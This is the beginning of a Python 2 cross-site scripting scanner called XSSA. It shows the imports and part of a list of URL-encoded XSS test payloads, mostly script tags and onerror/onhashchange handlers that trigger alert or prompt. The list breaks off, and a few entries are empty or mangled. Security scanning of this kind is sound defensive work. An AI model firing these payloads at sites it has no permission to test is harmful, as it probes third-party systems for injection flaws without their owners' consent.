#!/usr/bin/env python # -*- coding: cp1252 -*- # XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation # By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98 import urllib2 from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler import urllib from urllib import FancyURLopener import cookielib import socket import time import re import sys import httplib import colorama import ssl from functools import partial import custom from colorama import Fore, Back, Style from colorama import init colorama.init() ###Cross Site Scripting Payloads### xss_attack = ["%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E", "1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E", "", "'';!--\"=&{()}", "%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E" "ipt>alert(1)ipt>", "%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e", "%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit", "%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a", "%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e", "", "